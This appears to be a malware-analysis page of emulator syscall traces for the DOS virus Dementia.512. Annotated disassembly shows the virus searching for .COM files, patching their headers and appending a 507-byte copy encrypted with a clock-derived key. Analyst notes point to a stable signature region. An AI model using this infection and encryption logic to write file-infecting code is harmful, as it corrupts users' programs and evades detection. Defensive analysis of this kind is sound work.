Sample viewer

vx.netlux.org/Virus.DOS.Mnemonix.Dementia.512


Syscalls:

Time Syscall Op Syscall Name
; Emulator listing: linear disassembly starting at the return address of the
; INT 21h "Get date" call logged on this row (op 42 = AH=2Ah). It is decoded
; straight ahead, so it shows both sides of each branch, not the executed path.
; The rows after the listing show which path ran: a "Change current directory"
; row (PC 14a01) is logged only when the weekday compare matched.
2018-12-17T22:27:02.034319561Z 42 PC: 149f3 | Get date 0x149f3: cmp al, 3    ; AH=2Ah returns the day of week in AL (0 = Sunday), so 3 = Wednesday
0x149f5: jne 0x14a01                 ; any other weekday: skip the directory change
0x149f7: mov dx, bp                  ; bp is the base register for every data address formed here
0x149f9: add dx, 0x1fe               ; DS:DX -> path string at bp+0x1fe (its contents are not shown on this page)
0x149fd: mov ah, 0x3b                ; AH=3Bh: change current directory
0x149ff: int 0x21
0x14a01: mov ah, 0x4e                ; AH=4Eh: find first matching file
0x14a03: xor cx, cx                  ; CX=0: search attribute mask of zero
0x14a05: mov dx, bp
0x14a07: add dx, 0x201               ; DS:DX -> file spec at bp+0x201; presumably "*.COM" given the files opened in this trace - confirm
0x14a0b: int 0x21
0x14a0d: jb 0x14a31                  ; carry set = no match or error: leave the search
0x14a0f: mov ax, 0
0x14a12: mov es, ax                  ; ES = segment 0 (interrupt vector table)
0x14a14: cmp word ptr es:[3], -1     ; tests the word at 0000:0003 for 0xFFFF; purpose not visible in this listing
0x14a1a: je 0x14a29                  ; NOTE(review): 0x14a29 is not an instruction boundary in this listing (0x14a28 starts the last line)
0x14a1c: add bp, 0x1aa
0x14a20: mov byte ptr cs:[bp], 0x9a  ; stores byte 0x9A into the code segment at the new bp, i.e. the code patches itself
0x14a25: mov ax, 0xffff
0x14a28: dec word ptr [0xe807]       ; likely a decoding artifact: the je above lands one byte into this instruction
2018-12-17T22:27:02.037362926Z 78 PC: 14a0d | Find first file
2018-12-17T22:27:02.044336736Z 61 PC: 14a8a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:27:02.051533346Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.059150864Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.060742083Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.063646177Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.065485451Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
; Emulator listing: linear disassembly from the return address of the INT 21h
; "Get time" call on this row (op 44 = AH=2Ch). It derives a key from the clock,
; builds a 0x2e + 0x1cd = 0x1fb (507) byte image, and sets up the 507-byte
; write that the next log row records.
; Analyst note: the 461 transformed bytes depend on the key, so they differ
; between infected files; the 46 bytes copied unchanged (presumably the
; plaintext decryptor - confirm) are the stable part a byte signature can match.
2018-12-17T22:27:02.068320945Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh    ; AH=2Ch returns seconds in DH: seed for the running key
0x14afe: add ah, byte ptr [bx]       ; mix with the byte stored at [bx] ...
0x14b00: mov byte ptr [bx], ah       ; ... and store it back; AH is the running key in the loop below
0x14b02: mov dl, byte ptr [0x9a]     ; DL from DS:0x9A; if DS is the PSP and the DTA is the default PSP:0x80, this is the low byte of the found file's size - TODO confirm
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl   ; second stored byte; DL sets the key step below
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x2e (46) bytes copied DS:SI -> ES:DI unchanged
0x14b11: mov cx, 0x1cd               ; the next 0x1cd (461) bytes are transformed
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah                  ; out = in - key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                  ; key -= 2*DL after every byte (8-bit wraparound)
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx                      ; restores a BX pushed before this listing; presumably the file handle - confirm
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385               ; DS:DX -> buffer at bp+0x385
0x14b25: mov cx, 0x1fb               ; CX = 507 bytes, matching the write logged on the next row
0x14b28: mov ah, 0x40                ; AH=40h: write to file handle (the int 0x21 itself lies past the end of the listing)
2018-12-17T22:27:02.070862467Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.086465813Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.088259721Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.096592843Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.099369554Z 61 PC: 14a8a | Open file (Filename = 'PRINT.COM')
2018-12-17T22:27:02.107485796Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.114528905Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.116016145Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.119452928Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.120836138Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
; Emulator listing: linear disassembly from the return address of the INT 21h
; "Get time" call on this row (op 44 = AH=2Ch). It derives a key from the clock,
; builds a 0x2e + 0x1cd = 0x1fb (507) byte image, and sets up the 507-byte
; write that the next log row records.
; Analyst note: the 461 transformed bytes depend on the key, so they differ
; between infected files; the 46 bytes copied unchanged (presumably the
; plaintext decryptor - confirm) are the stable part a byte signature can match.
2018-12-17T22:27:02.126417838Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh    ; AH=2Ch returns seconds in DH: seed for the running key
0x14afe: add ah, byte ptr [bx]       ; mix with the byte stored at [bx] ...
0x14b00: mov byte ptr [bx], ah       ; ... and store it back; AH is the running key in the loop below
0x14b02: mov dl, byte ptr [0x9a]     ; DL from DS:0x9A; if DS is the PSP and the DTA is the default PSP:0x80, this is the low byte of the found file's size - TODO confirm
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl   ; second stored byte; DL sets the key step below
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x2e (46) bytes copied DS:SI -> ES:DI unchanged
0x14b11: mov cx, 0x1cd               ; the next 0x1cd (461) bytes are transformed
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah                  ; out = in - key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                  ; key -= 2*DL after every byte (8-bit wraparound)
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx                      ; restores a BX pushed before this listing; presumably the file handle - confirm
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385               ; DS:DX -> buffer at bp+0x385
0x14b25: mov cx, 0x1fb               ; CX = 507 bytes, matching the write logged on the next row
0x14b28: mov ah, 0x40                ; AH=40h: write to file handle (the int 0x21 itself lies past the end of the listing)
2018-12-17T22:27:02.129562498Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.138355221Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.139896689Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.149162148Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.152428265Z 61 PC: 14a8a | Open file (Filename = 'HELLO.COM')
2018-12-17T22:27:02.160104237Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.168140207Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.169595053Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.172409866Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.175221322Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
; Emulator listing: linear disassembly from the return address of the INT 21h
; "Get time" call on this row (op 44 = AH=2Ch). It derives a key from the clock,
; builds a 0x2e + 0x1cd = 0x1fb (507) byte image, and sets up the 507-byte
; write that the next log row records.
; Analyst note: the 461 transformed bytes depend on the key, so they differ
; between infected files; the 46 bytes copied unchanged (presumably the
; plaintext decryptor - confirm) are the stable part a byte signature can match.
2018-12-17T22:27:02.178111848Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh    ; AH=2Ch returns seconds in DH: seed for the running key
0x14afe: add ah, byte ptr [bx]       ; mix with the byte stored at [bx] ...
0x14b00: mov byte ptr [bx], ah       ; ... and store it back; AH is the running key in the loop below
0x14b02: mov dl, byte ptr [0x9a]     ; DL from DS:0x9A; if DS is the PSP and the DTA is the default PSP:0x80, this is the low byte of the found file's size - TODO confirm
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl   ; second stored byte; DL sets the key step below
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x2e (46) bytes copied DS:SI -> ES:DI unchanged
0x14b11: mov cx, 0x1cd               ; the next 0x1cd (461) bytes are transformed
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah                  ; out = in - key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                  ; key -= 2*DL after every byte (8-bit wraparound)
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx                      ; restores a BX pushed before this listing; presumably the file handle - confirm
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385               ; DS:DX -> buffer at bp+0x385
0x14b25: mov cx, 0x1fb               ; CX = 507 bytes, matching the write logged on the next row
0x14b28: mov ah, 0x40                ; AH=40h: write to file handle (the int 0x21 itself lies past the end of the listing)
2018-12-17T22:27:02.180694037Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.189937877Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.191748608Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.200477096Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.203600187Z 61 PC: 14a8a | Open file (Filename = 'PHANG.COM')
2018-12-17T22:27:02.2109374Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.217953067Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.219383468Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.224952303Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.226620918Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
; Emulator listing: linear disassembly from the return address of the INT 21h
; "Get time" call on this row (op 44 = AH=2Ch). It derives a key from the clock,
; builds a 0x2e + 0x1cd = 0x1fb (507) byte image, and sets up the 507-byte
; write that the next log row records.
; Analyst note: the 461 transformed bytes depend on the key, so they differ
; between infected files; the 46 bytes copied unchanged (presumably the
; plaintext decryptor - confirm) are the stable part a byte signature can match.
2018-12-17T22:27:02.229524041Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh    ; AH=2Ch returns seconds in DH: seed for the running key
0x14afe: add ah, byte ptr [bx]       ; mix with the byte stored at [bx] ...
0x14b00: mov byte ptr [bx], ah       ; ... and store it back; AH is the running key in the loop below
0x14b02: mov dl, byte ptr [0x9a]     ; DL from DS:0x9A; if DS is the PSP and the DTA is the default PSP:0x80, this is the low byte of the found file's size - TODO confirm
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl   ; second stored byte; DL sets the key step below
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x2e (46) bytes copied DS:SI -> ES:DI unchanged
0x14b11: mov cx, 0x1cd               ; the next 0x1cd (461) bytes are transformed
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah                  ; out = in - key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                  ; key -= 2*DL after every byte (8-bit wraparound)
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx                      ; restores a BX pushed before this listing; presumably the file handle - confirm
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385               ; DS:DX -> buffer at bp+0x385
0x14b25: mov cx, 0x1fb               ; CX = 507 bytes, matching the write logged on the next row
0x14b28: mov ah, 0x40                ; AH=40h: write to file handle (the int 0x21 itself lies past the end of the listing)
2018-12-17T22:27:02.232905428Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.242515332Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.244655092Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.254408561Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.257277373Z 61 PC: 14a8a | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:27:02.2644668Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.272047375Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.27360355Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.276494528Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.27863691Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
; Emulator listing: linear disassembly from the return address of the INT 21h
; "Get time" call on this row (op 44 = AH=2Ch). It derives a key from the clock,
; builds a 0x2e + 0x1cd = 0x1fb (507) byte image, and sets up the 507-byte
; write that the next log row records.
; Analyst note: the 461 transformed bytes depend on the key, so they differ
; between infected files; the 46 bytes copied unchanged (presumably the
; plaintext decryptor - confirm) are the stable part a byte signature can match.
2018-12-17T22:27:02.281922197Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh    ; AH=2Ch returns seconds in DH: seed for the running key
0x14afe: add ah, byte ptr [bx]       ; mix with the byte stored at [bx] ...
0x14b00: mov byte ptr [bx], ah       ; ... and store it back; AH is the running key in the loop below
0x14b02: mov dl, byte ptr [0x9a]     ; DL from DS:0x9A; if DS is the PSP and the DTA is the default PSP:0x80, this is the low byte of the found file's size - TODO confirm
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl   ; second stored byte; DL sets the key step below
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x2e (46) bytes copied DS:SI -> ES:DI unchanged
0x14b11: mov cx, 0x1cd               ; the next 0x1cd (461) bytes are transformed
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah                  ; out = in - key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                  ; key -= 2*DL after every byte (8-bit wraparound)
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx                      ; restores a BX pushed before this listing; presumably the file handle - confirm
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385               ; DS:DX -> buffer at bp+0x385
0x14b25: mov cx, 0x1fb               ; CX = 507 bytes, matching the write logged on the next row
0x14b28: mov ah, 0x40                ; AH=40h: write to file handle (the int 0x21 itself lies past the end of the listing)
2018-12-17T22:27:02.284604323Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.294712216Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.296572695Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.305500364Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.309097639Z 61 PC: 14a8a | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:27:02.317086607Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.32412218Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.326281199Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.329119112Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.330581247Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
; Emulator listing: linear disassembly from the return address of the INT 21h
; "Get time" call on this row (op 44 = AH=2Ch). It derives a key from the clock,
; builds a 0x2e + 0x1cd = 0x1fb (507) byte image, and sets up the 507-byte
; write that the next log row records.
; Analyst note: the 461 transformed bytes depend on the key, so they differ
; between infected files; the 46 bytes copied unchanged (presumably the
; plaintext decryptor - confirm) are the stable part a byte signature can match.
2018-12-17T22:27:02.333981559Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh    ; AH=2Ch returns seconds in DH: seed for the running key
0x14afe: add ah, byte ptr [bx]       ; mix with the byte stored at [bx] ...
0x14b00: mov byte ptr [bx], ah       ; ... and store it back; AH is the running key in the loop below
0x14b02: mov dl, byte ptr [0x9a]     ; DL from DS:0x9A; if DS is the PSP and the DTA is the default PSP:0x80, this is the low byte of the found file's size - TODO confirm
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl   ; second stored byte; DL sets the key step below
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x2e (46) bytes copied DS:SI -> ES:DI unchanged
0x14b11: mov cx, 0x1cd               ; the next 0x1cd (461) bytes are transformed
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah                  ; out = in - key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                  ; key -= 2*DL after every byte (8-bit wraparound)
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx                      ; restores a BX pushed before this listing; presumably the file handle - confirm
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385               ; DS:DX -> buffer at bp+0x385
0x14b25: mov cx, 0x1fb               ; CX = 507 bytes, matching the write logged on the next row
0x14b28: mov ah, 0x40                ; AH=40h: write to file handle (the int 0x21 itself lies past the end of the listing)
2018-12-17T22:27:02.336749199Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.345723343Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.347905316Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.356768048Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.359800435Z 61 PC: 14a8a | Open file (Filename = 'PAH.COM')
2018-12-17T22:27:02.367594969Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.37675011Z 66 PC: 14ac3 | Move file pointer
2018-12-17T22:27:02.379299839Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:27:02.382163164Z 66 PC: 14ad9 | Move file pointer
2018-12-17T22:27:02.384360717Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
; Emulator listing: linear disassembly from the return address of the INT 21h
; "Get time" call on this row (op 44 = AH=2Ch). It derives a key from the clock,
; builds a 0x2e + 0x1cd = 0x1fb (507) byte image, and sets up the 507-byte
; write that the next log row records.
; Analyst note: the 461 transformed bytes depend on the key, so they differ
; between infected files; the 46 bytes copied unchanged (presumably the
; plaintext decryptor - confirm) are the stable part a byte signature can match.
2018-12-17T22:27:02.386291273Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh    ; AH=2Ch returns seconds in DH: seed for the running key
0x14afe: add ah, byte ptr [bx]       ; mix with the byte stored at [bx] ...
0x14b00: mov byte ptr [bx], ah       ; ... and store it back; AH is the running key in the loop below
0x14b02: mov dl, byte ptr [0x9a]     ; DL from DS:0x9A; if DS is the PSP and the DTA is the default PSP:0x80, this is the low byte of the found file's size - TODO confirm
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl   ; second stored byte; DL sets the key step below
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x2e (46) bytes copied DS:SI -> ES:DI unchanged
0x14b11: mov cx, 0x1cd               ; the next 0x1cd (461) bytes are transformed
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah                  ; out = in - key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                  ; key -= 2*DL after every byte (8-bit wraparound)
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx                      ; restores a BX pushed before this listing; presumably the file handle - confirm
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385               ; DS:DX -> buffer at bp+0x385
0x14b25: mov cx, 0x1fb               ; CX = 507 bytes, matching the write logged on the next row
0x14b28: mov ah, 0x40                ; AH=40h: write to file handle (the int 0x21 itself lies past the end of the listing)
2018-12-17T22:27:02.389184007Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:27:02.399422268Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.401494847Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.410448251Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.41426412Z 61 PC: 14a8a | Open file (Filename = 'TEST.COM')
2018-12-17T22:27:02.422043822Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:27:02.425463029Z 87 PC: 14b39 | Get or set file date and time
2018-12-17T22:27:02.428435419Z 62 PC: 14b3d | Close file
2018-12-17T22:27:02.436779136Z 79 PC: 14a38 | Find next file
2018-12-17T22:27:02.439601105Z 9 PC: 12a47 | Display string (String= '')
2018-12-17T22:27:02.442848408Z 9 PC: 12a4c | Display string (String= '����������������������������������������������������������������������ͻ ')
2018-12-17T22:27:02.446508694Z 9 PC: 12a51 | Display string (String= '� !!! WARNING INFECTED FILE !!! � ')
2018-12-17T22:27:02.453316379Z 9 PC: 12a56 | Display string (String= '� � ')
2018-12-17T22:27:02.459717956Z 9 PC: 12a5b | Display string (String= '� FILE NAME ***************************** FILE SIZE *************** � ')
2018-12-17T22:27:02.465917937Z 9 PC: 12a60 | Display string (String= '� � ')
2018-12-17T22:27:02.472581098Z 9 PC: 12a65 | Display string (String= '� NOTES: � ')
2018-12-17T22:27:02.478901911Z 9 PC: 12a6a | Display string (Could not find end pointer)
2018-12-17T22:27:02.489164697Z 9 PC: 12a6f | Display string (String= '*********************************************** � � ******************************************************************** � ')
2018-12-17T22:27:02.497073427Z 9 PC: 12a74 | Display string (String= '� INFECTED FILES SHOULD BE UPLOADED TO THE METAVERSE BBS (606) 843-9363� � COPYRIGHT (c) 1993 ROBERT BULLOCK, RT 4 BOX 413E KEAVY, KY 40737 � ')
2018-12-17T22:27:02.50493933Z 9 PC: 12a79 | Display string (String= '����������������������������������������������������������������������ͼ ')
2018-12-17T22:27:02.512577505Z 9 PC: 12a7e | Display string (String= '')
2018-12-17T22:27:02.514766487Z 76 PC: 12a83 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4797,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Emulator listing: linear disassembly starting at the return address of the
; INT 21h "Get date" call logged on this row (op 42 = AH=2Ah). It is decoded
; straight ahead, so it shows both sides of each branch, not the executed path.
; The rows after the listing show which path ran: a "Change current directory"
; row (PC 14a01) is logged only when the weekday compare matched.
2018-12-25T11:52:55.335599083Z 42 PC: 149f3 | Get date 0x149f3: cmp al, 3    ; AH=2Ah returns the day of week in AL (0 = Sunday), so 3 = Wednesday
0x149f5: jne 0x14a01                 ; any other weekday: skip the directory change
0x149f7: mov dx, bp                  ; bp is the base register for every data address formed here
0x149f9: add dx, 0x1fe               ; DS:DX -> path string at bp+0x1fe (its contents are not shown on this page)
0x149fd: mov ah, 0x3b                ; AH=3Bh: change current directory
0x149ff: int 0x21
0x14a01: mov ah, 0x4e                ; AH=4Eh: find first matching file
0x14a03: xor cx, cx                  ; CX=0: search attribute mask of zero
0x14a05: mov dx, bp
0x14a07: add dx, 0x201               ; DS:DX -> file spec at bp+0x201; presumably "*.COM" given the file opened in this trace - confirm
0x14a0b: int 0x21
0x14a0d: jb 0x14a31                  ; carry set = no match or error: leave the search
0x14a0f: mov ax, 0
0x14a12: mov es, ax                  ; ES = segment 0 (interrupt vector table)
0x14a14: cmp word ptr es:[3], -1     ; tests the word at 0000:0003 for 0xFFFF; purpose not visible in this listing
0x14a1a: je 0x14a29                  ; NOTE(review): 0x14a29 is not an instruction boundary in this listing (0x14a28 starts the last line)
0x14a1c: add bp, 0x1aa
0x14a20: mov byte ptr cs:[bp], 0x9a  ; stores byte 0x9A into the code segment at the new bp, i.e. the code patches itself
0x14a25: mov ax, 0xffff
0x14a28: dec word ptr [0xe807]       ; likely a decoding artifact: the je above lands one byte into this instruction
2018-12-25T11:52:55.338549685Z 78 PC: 14a0d | Find first file
2018-12-25T11:52:55.346133534Z 61 PC: 14a8a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:55.353746206Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:52:55.361916357Z 66 PC: 14ac3 | Move file pointer
2018-12-25T11:52:55.363773495Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.367032734Z 66 PC: 14ad9 | Move file pointer
2018-12-25T11:52:55.369448922Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
; Emulator listing: linear disassembly from the return address of the INT 21h
; "Get time" call on this row (op 44 = AH=2Ch). It derives a key from the clock,
; builds a 0x2e + 0x1cd = 0x1fb (507) byte image, and sets up the 507-byte
; write that the next log row records.
; Analyst note: the 461 transformed bytes depend on the key, so they differ
; between infected files; the 46 bytes copied unchanged (presumably the
; plaintext decryptor - confirm) are the stable part a byte signature can match.
2018-12-25T11:52:55.372578737Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh    ; AH=2Ch returns seconds in DH: seed for the running key
0x14afe: add ah, byte ptr [bx]       ; mix with the byte stored at [bx] ...
0x14b00: mov byte ptr [bx], ah       ; ... and store it back; AH is the running key in the loop below
0x14b02: mov dl, byte ptr [0x9a]     ; DL from DS:0x9A; if DS is the PSP and the DTA is the default PSP:0x80, this is the low byte of the found file's size - TODO confirm
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl   ; second stored byte; DL sets the key step below
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]    ; first 0x2e (46) bytes copied DS:SI -> ES:DI unchanged
0x14b11: mov cx, 0x1cd               ; the next 0x1cd (461) bytes are transformed
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah                  ; out = in - key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                  ; key -= 2*DL after every byte (8-bit wraparound)
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx                      ; restores a BX pushed before this listing; presumably the file handle - confirm
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385               ; DS:DX -> buffer at bp+0x385
0x14b25: mov cx, 0x1fb               ; CX = 507 bytes, matching the write logged on the next row
0x14b28: mov ah, 0x40                ; AH=40h: write to file handle (the int 0x21 itself lies past the end of the listing)
2018-12-25T11:52:55.375276853Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:52:55.399177171Z 87 PC: 14b39 | Get or set file date and time
2018-12-25T11:52:55.400771427Z 62 PC: 14b3d | Close file
2018-12-25T11:52:55.408720577Z 79 PC: 14a38 | Find next file
2018-12-25T11:52:55.411530263Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.41919886Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.426752846Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.428327085Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.432631224Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.434411607Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.437625669Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.441390902Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.45037564Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.452165887Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.461578986Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.464615051Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.471848345Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.478997449Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.480347777Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.483142584Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.485131369Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.487674384Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.49017472Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.498453717Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.501055857Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.509716949Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.513163732Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.521240136Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.52920058Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.530931151Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.534763015Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.536111291Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.538049369Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.540648498Z 64 PC: 14b2c | Write file or device (See above)
